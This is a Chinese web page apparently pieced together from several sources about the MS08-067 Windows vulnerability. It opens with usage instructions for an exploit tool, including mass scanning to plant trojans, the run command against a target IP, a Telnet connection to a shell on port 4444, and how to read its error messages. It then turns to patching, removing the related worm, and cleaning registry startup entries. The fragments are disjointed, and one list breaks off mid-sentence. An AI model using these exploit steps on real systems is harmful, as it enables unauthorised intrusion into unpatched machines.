MS08067的使用方法
这个使用方法也非常简单,先配置好FTP文件,然后设置IP段,最后运行BAT文件就开始自动循环扫描传马了。 ...
使用方法非常简单,
cmd下直接运行MS08-067.exe IP即可。
若是提示:
SMB Connect OK!
Send Payload Over!
表明成功了。
接着就可以通过4444端口连接了
Telnet XXX.XXX.XXX.XXX 4444
若是提示:
SMB Connect OK!
RpcExceptionCode() = 1722
表明目标开了防火墙,溢出失败。
若是提示:
SMB Connect OK!
Maybe Patched!
表明目标已经打上补丁了。
若是提示:
Make SMB Connection error:1203
表明目标没有开启Server、Workstation、Computer Browser其中的任何一种服务。
若是提示:
Make SMB Connection error:53
表明目标没开445端口或本地网络问题。
ms08-067漏洞补丁
第一关闭共享!关闭共享 1、从命令行里打开计算机管理平台(compmgmt.msc)。 2、左键单击共享文件夹。 3、右键选中所重要的共享文件夹,在下拉框中选择停止共享。 4、确认这个操作。 也可以通过在命令提示符中键入:net share sharename /delete 来取消共享 打全系统补丁就可以 也就是利用微软的自动更新打好补丁注意:打好补丁之后 仍然无法避免防火墙报警这个攻击用一个图表示恶意攻击 >> 防火墙 >> 带有补丁的系统也就是 防火墙类似于一个大门 你的系统是在这扇门保护下的 你无法避免 恶意攻击试图攻击你 如果还有恶意代码攻击你 防火墙仍会报警 不过没什么问题了!!!最后是到官网上下个补丁打上MS08-067
参考资料:链接地址: http://dl.rising.com.cn/DownLoadInfo/2008-11-03/1225691872d50245.shtml
worm.win32.MS08-067.a这个病毒怎么彻底杀掉?拜托了各位 谢谢
1. 下载补丁 http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03 (Windows XP SP2; Windows XP SP3) ) http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=f26d395d-2459-4e40-8c92-3de1c52c390d Windows Server 2003 SP 1; Windows Server 2003 SP2) 其他系统类型请自行搜索下载 2 . 打好补丁后,禁用系统还原(我的电脑-右键属性里,禁用所有磁盘的系统还原,然后可以尝试删除除了系统盘以外的系统还原文件夹,注意如果分区为NTFS格式,可能有删不掉的文件,忽略,按下面操作)。 使用MSRT(此处不清楚可以详读一下操作说明)。 3.如果杀毒软件依然报毒 单击开始> “运行 键入regedit 单击确定,搜索仍然提示的文件名或路径,将它的项目删除(不清楚项目名称可以参看网上对于Conficker蠕虫分析) 4.实在不行,打完补丁,关闭系统还原(步骤2),删除所有帐户,新建帐户,设置密码,尝试按照网页提示手工清理 5. 清理完毕后,确认杀毒软件可以正常升级,升级后全盘扫描一次 6.使用超级兔子清理王,清除注册表错误信息(除了压缩注册表全选),此操作应不定期进行一次 使用ATF CLEANER,清除所有临时文件 补充: 这是一个利用 微软 漏洞进行传播的 蠕虫病毒 。它利用 微软操作系统 的MS08-067漏洞,将自己植入未打补丁的 电脑 ,并以局域网、U盘等多种方式传播。 病毒 运行后会进行以下操作: 1、首先病毒会判断系统版本是否是 Win2000或 WinXP 以上系统,如果是病毒才继续执行; 2、给病毒所在进程添加 SeDebugPrivilege 权限,对本机 计算机名 称进行 CRC32 计算,通过得到的 CRC32 值创建病毒 互斥 量,判断自己是否是 rundll32.exe 程序启动的; 3、判断是否能找到"svchost.exe -k netsvcs" 或者explorer.exe 进程,将自己代码放到那两个中的一个里面去,然后 修改注册表 不显示隐 藏文 件; 4、针对services.exe、"svchost.exe -k netsvcs"、"svchost.exe -k NetworkService"进程进行DNS查询以及TCP传输过程拦截; 5、针对 杀毒软件 关键字 进行过滤,其中包含 rising、avast、nod32、mcafee 等等。使当前中毒 计算机 无法访 问安 全厂商的网站; 6、停止 wscsvc、wuauserv、BITS、WinDefend、Windows Defender、ERSvc、WerSvc服务,并且 补充: 改为手动
病毒ms08-.067.eu杀不掉,高手救
用注册表防止病毒复活
经常在网络上冲浪,十有八九避免不了网络病毒的攻击,用专业杀毒程序清除了这些病毒程序并重新启动计算机系统后,我们有时会发现先前已经被清除干净的病毒又卷土重来了,这是怎么回事呢?
原来目前不少流行的网络病毒一旦启动后,会自动在计算机系统的注册表启动项中遗留有修复选项,待系统重新启动后这些病毒就能恢复到修改前的状态了。为了“拒绝”网络病毒重启,我们可以从一些细节出发,来手工将注册表中的病毒遗留选项及时删除掉,以确保计算机系统不再遭受病毒的攻击。
阻止通过网页形式启动
不少计算机系统感染了网络病毒后,可能会在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce、HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices等注册表分支下面的键值中,出现有类似有.html或.htm这样的内容,事实上这类启动键值主要作用就是等计算机系统启动成功后,自动访问包含网络病毒的特定网站,如果我们不把这些启动键值及时删除掉的话,很容易会导致网络病毒重新发作。
为此,我们在使用杀毒程序清除了计算机系统中的病毒后,还需要及时打开系统注册表编辑窗口,并在该窗口中逐一查看上面的几个注册表分支选项,看看这些分支下面的启动键值中是否包含有.html或.htm这样的后缀,一旦发现的话我们必须选中该键值,然后依次单击“编辑”/“删除”命令,将选中的目标键值删除掉,最后按F5功能键刷新一下系统注册表就可以了。
当然,也有一些病毒会在上述几个注册表分支下面的启动键值中,遗留有.vbs格式的启动键值,发现这样的启动键值时我们也要一并将它们删除掉。
阻止通过后门进行启动
为了躲避用户的手工“围剿”,不少网络病毒会在系统注册表的启动项中进行一些伪装隐蔽操作,不熟悉系统的用户往往不敢随意清除这些启动键值,这样一来病毒程序就能达到重新启动目的了。
例如,一些病毒会在上面几个注册表分支下面创建一个名为“system32”的启动键值,并将该键值的数值设置成“regedit -s D:\Windows”(如图1所示);咋看上去,许多用户会认为这个启动键值是计算机系统自动产生的,而不敢随意将它删除掉,殊不知“-s”参数其实是系统注册表的后门参数,该参数作用是用来导入注册表的,同时能够在Windows系统的安装目录中自动产生vbs格式的文件,通过这些文件病毒就能实现自动启动的目的了。所以,当我们在上面几个注册表分支的启动项中看到“regedit -s D:\Windows”这样的带后门参数键值时,必须毫不留情地将它删除掉。
阻止通过文件进行启动
除了要检查注册表启动键值外,我们还要对系统的“Win.ini”文件进行一下检查,因为网络病毒也会在这个文件中自动产生一些遗留项目,如果不将该文件中的非法启动项目删除掉的话,网络病毒也会卷土重来的。
一般来说,“Win.ini”文件常位于系统的Windows安装目录中,我们可以进入到系统的资源管理器窗口,并在该窗口中找到并打开该文件,然后在文件编辑区域中检查“run=”、“load=”等选项后面是否包含一些来历不明的内容,要是发现的话,必须及时将“=”后面的内容清除干净;当然,在删除之前最好看一下具体的文件名和路径,完成删除操作后,再进入到系统的“system”文件夹窗口中将对应的病毒文件删除掉。
